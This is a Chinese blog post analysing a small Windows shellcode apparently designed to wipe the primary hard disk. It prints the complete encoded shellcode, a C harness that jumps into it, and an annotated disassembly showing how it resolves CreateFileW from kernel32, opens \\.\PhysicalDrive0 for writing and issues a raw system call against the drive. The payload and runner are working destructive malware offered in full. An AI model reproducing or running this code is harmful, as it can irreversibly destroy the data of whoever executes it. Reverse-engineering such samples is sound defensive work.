一段格盘的shellcode分析

浏览数:145 / 时间:2015年06月20日

shellcode出处:

史上最小无需重定位的"格盘"ShellCode - 半斤八两
http://bbs.pediy.com/showthread.php?t=194664

shellcode源码:

char g_szFromShellCode[] = 
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0"
"BBABXP8ABuJIrulKzLMQJLopwp5PuP8GW5k03sqb"
"CUCQHGReOtRTPeQVayXGpEOx0lsUv7uPlMSuoppP"
"RpV5NkhlK3JLwxLKQU5XPSrvrwLKDHLKPPS4xGpEK"
"LUPuPgpS0ni0MkHMYRuc8sTMqP030uPUPLK704LlK"
"2PeLNMLKCpUXlKKHNkG7elnkpTUWRXgszwLKPJuHL"
"KaJq0VcyOriNk4tLKwsl7lKCuzXEi5VqeKCnkaUfh"
"09PFVdpuZKLKpZEts3KoqvLKDLBkNkRzgluSYOLKu"
"TlKGsYWoycuKLlKqUKLaOQNSknkkUQMLIQUx48Gg5"
"nlQLWpslWpHGw5Np4nuPqLuPKwSulTF0UP1xePjg3"
"umHpyGpcC7po7SuolayUPSSwpO7QUoPSQWpBLWpO7"
"3uOT1Ts0Pr30KwSuOXcYWpcFuPO7reNL3UeP4pwpK"
"wcuNPWpwpePePsZgpCZWpPjs3pjePazdC1x5Pc07p"
"KpLMCuLLPPlKcuODKOXPLKZxNmRmmhLMrunXp3O0v"
"0RpBpPPrHePKqEWuPPQbrpPv0QCh8aRGpWpc0nm2t"
"a4ZXVoudWp";

int main(int argc, char* argv[])
{
    _asm
    {
        lea eax, g_szFromShellCode
        call eax
    }
        return 0;
}

shellcode有一段自己解密代码的汇编,很简单就不贴了,看下解密后的:

.data:00406030                   pfnShellCode proc near                  ; DATA XREF: _maino
.data:00406030
.data:00406030                   szCreateFileW= byte ptr -80h
.data:00406030                   szPhysicalDrive0= byte ptr -74h
.data:00406030                   pCreateFileW= dword ptr -4Ch
.data:00406030                   var_48= byte ptr -48h
.data:00406030                   szCrea= dword ptr -8
.data:00406030                   pROCESSOR_ARCHITECTURE= dword ptr -4
.data:00406030                   szTeFi= dword ptr  8
.data:00406030
.data:00406030 55                      push    ebp
.data:00406031 8B EC                   mov     ebp, esp
.data:00406033 81 EC 80 00 00 00       sub     esp, 80h
.data:00406039 C7 45 80 43 72 65+      mov     dword ptr [ebp+szCreateFileW], ‘aerC‘ ; CreateFileW
.data:00406040 C7 45 84 74 65 46+      mov     dword ptr [ebp+szCreateFileW+4], ‘iFet‘
.data:00406047 C7 45 88 6C 65 57+      mov     dword ptr [ebp+szCreateFileW+8], ‘Wel‘
.data:0040604E 8D 45 80                lea     eax, [ebp+szCreateFileW]
.data:00406051 50                      push    eax
.data:00406052 50                      push    eax
.data:00406053 55                      push    ebp
.data:00406054 8B EC                   mov     ebp, esp
.data:00406056 83 EC 08                sub     esp, 8
.data:00406059 8B 45 08                mov     eax, [ebp+szTeFi]
.data:0040605C 53                      push    ebx
.data:0040605D 56                      push    esi
.data:0040605E 57                      push    edi
.data:0040605F 8B 08                   mov     ecx, [eax]
.data:00406061 8B 50 04                mov     edx, [eax+4]              ;
.data:00406061                                                           ; ;Save String"CreateFi"
.data:00406064 C7 45 FC 00 00 00+      mov     [ebp+pROCESSOR_ARCHITECTURE], 0
.data:0040606B 89 4D F8                mov     [ebp+szCrea], ecx
.data:0040606E 89 55 08                mov     [ebp+szTeFi], edx
.data:00406071 64 A1 30 00 00 00       mov     eax, large fs:30h         ; Get _peb
.data:00406077 8B 40 0C                mov     eax, [eax+0Ch]            ; Get Ldr_PEB_LDR_DATA
.data:0040607A 8B 70 1C                mov     esi, [eax+1Ch]            ; Get InLoadOrderModuleList(First -> NtDll LoadInfoList)
.data:0040607D AD                      lodsd                             ; LoadInfoList++ : Second -> kernel32 LoadInfoList
.data:0040607D                                                           ;
.data:0040607D                                                           ; GetDllInfo
.data:0040607D                                                           ; ;
.data:0040607E 8B 40 08                mov     eax, [eax+8]              ; Get Kernel32_ImageBase
.data:00406081 8B F8                   mov     edi, eax
.data:00406083 8B 47 3C                mov     eax, [edi+3Ch]            ; Get _IMAGE_DOS_HEADER.e_lfanew
.data:00406086 8B 54 07 78             mov     edx, [edi+eax+78h]        ; Get Export Table offset
.data:0040608A 03 D7                   add     edx, edi                  ; Export Table address
.data:0040608C 8B 4A 18                mov     ecx, [edx+18h]            ; Get ExportDirectory->NumberOfFunctions
.data:0040608F 8B 5A 20                mov     ebx, [edx+20h]            ; Get ExportDirectory->AddressOfFunctions
.data:0040608F                                                           ; ;
.data:00406092 03 DF                   add     ebx, edi
.data:00406094
.data:00406094                   GetExportFunName_Begin:                 ; CODE XREF: pfnShellCode+6Fj
.data:00406094                                                           ; pfnShellCode+77j
.data:00406094 49                      dec     ecx                       ; NumberOfFunctions--
.data:00406095 8B 34 8B                mov     esi, [ebx+ecx*4]
.data:00406098 03 F7                   add     esi, edi                  ; Get Kernel32 ExportFunName
.data:0040609A 8B 45 F8                mov     eax, [ebp+szCrea]
.data:0040609D 39 06                   cmp     [esi], eax
.data:0040609F 75 F3                   jnz     short GetExportFunName_Begin ; NumberOfFunctions--
.data:004060A1 8B 45 08                mov     eax, [ebp+szTeFi]
.data:004060A4 39 46 04                cmp     [esi+4], eax
.data:004060A7 75 EB                   jnz     short GetExportFunName_Begin ;
.data:004060A7                                                           ; ;GetExportFunName_End
.data:004060A9 8B 5A 24                mov     ebx, [edx+24h]            ; 获取环境变量ROCESSOR_ARCHITECTURE
.data:004060AC 03 DF                   add     ebx, edi
.data:004060AE 66 8B 0C 4B             mov     cx, [ebx+ecx*2]
.data:004060B2 8B 5A 1C                mov     ebx, [edx+1Ch]
.data:004060B5 03 DF                   add     ebx, edi
.data:004060B7 8B 04 8B                mov     eax, [ebx+ecx*4]
.data:004060BA 03 C7                   add     eax, edi
.data:004060BC 89 45 FC                mov     [ebp+pROCESSOR_ARCHITECTURE], eax
.data:004060BF 8B 45 FC                mov     eax, [ebp+pROCESSOR_ARCHITECTURE]
.data:004060C2 5F                      pop     edi
.data:004060C3 5E                      pop     esi
.data:004060C4 5B                      pop     ebx
.data:004060C5 8B E5                   mov     esp, ebp
.data:004060C7 5D                      pop     ebp
.data:004060C8 89 45 B4                mov     [ebp+pCreateFileW], eax
.data:004060CB C7 45 8C 5C 00 5C+      mov     dword ptr [ebp+szPhysicalDrive0], 5C005Ch ; 获得"\\.\PhysicalDrive0\"(即本机器的物理驱动器0->主硬盘)
.data:004060D2 C7 45 90 2E 00 5C+      mov     dword ptr [ebp+szPhysicalDrive0+4], 5C002Eh
.data:004060D9 C7 45 94 50 00 68+      mov     dword ptr [ebp+szPhysicalDrive0+8], 680050h
.data:004060E0 C7 45 98 79 00 73+      mov     dword ptr [ebp+szPhysicalDrive0+0Ch], 730079h
.data:004060E7 C7 45 9C 69 00 63+      mov     dword ptr [ebp+szPhysicalDrive0+10h], 630069h
.data:004060EE C7 45 A0 61 00 6C+      mov     dword ptr [ebp+szPhysicalDrive0+14h], 6C0061h
.data:004060F5 C7 45 A4 44 00 72+      mov     dword ptr [ebp+szPhysicalDrive0+18h], 720044h
.data:004060FC C7 45 A8 69 00 76+      mov     dword ptr [ebp+szPhysicalDrive0+1Ch], 760069h
.data:00406103 C7 45 AC 65 00 30+      mov     dword ptr [ebp+szPhysicalDrive0+20h], 300065h
.data:0040610A C7 45 B0 00 00 00+      mov     dword ptr [ebp+szPhysicalDrive0+24h], 0 ;
.data:0040610A 00                                                        ; CreateFileW(szPhysicalDrive0, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
.data:00406111 6A 00                   push    0                         ; push NULL
.data:00406113 6A 00                   push    0                         ; push NULL
.data:00406115 6A 03                   push    3                         ; push OPEN_EXISTING
.data:00406117 6A 00                   push    0                         ; push NULL
.data:00406119 6A 03                   push    3                         ; push FILE_SHARE_READ | FILE_SHARE_WRITE
.data:0040611B 68 00 00 00 C0          push    0C0000000h                ; push GENERIC_READ|GENERIC_WRITE
.data:00406120 8D 45 8C                lea     eax, [ebp+szPhysicalDrive0]
.data:00406123 50                      push    eax                       ; push szPhysicalDrive0
.data:00406124 8B 45 B4                mov     eax, [ebp+pCreateFileW]
.data:00406127 FF D0                   call    eax                       ; call CreateFIleW
.data:00406129 8B D8                   mov     ebx, eax                  ; save hFile
.data:00406129                                                           ; ;
.data:0040612B 8D 4D B8                lea     ecx, [ebp+var_48]
.data:0040612E 8D 55 B8                lea     edx, [ebp+var_48]
.data:00406131 33 C0                   xor     eax, eax
.data:00406133 50                      push    eax                       ; push NULL
.data:00406134 50                      push    eax                       ; push NULL
.data:00406135 50                      push    eax                       ; push NULL
.data:00406136 50                      push    eax                       ; push NULL
.data:00406137 68 00 C1 07 00          push    7C100h
.data:0040613C 51                      push    ecx                       ; push pUnkonw
.data:0040613D 52                      push    edx                       ; push pUnkonw
.data:0040613E 50                      push    eax                       ; push NULL
.data:0040613F 50                      push    eax                       ; push NULL
.data:00406140 53                      push    ebx                       ; push hFile
.data:00406141 B8 42 00 00 00          mov     eax, 42h
.data:00406146 8D 54 24 F8             lea     edx, [esp+54h+szPhysicalDrive0+18h] ; lea (&((DWORD)szPhysicalDrive0 - 4))
.data:0040614A 0F 34                   sysenter

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。

标签: class log com 代码 http si it la sp class log com 代码 http si it la sp

相关文章

随机文章

您可能还喜欢

您可能还喜欢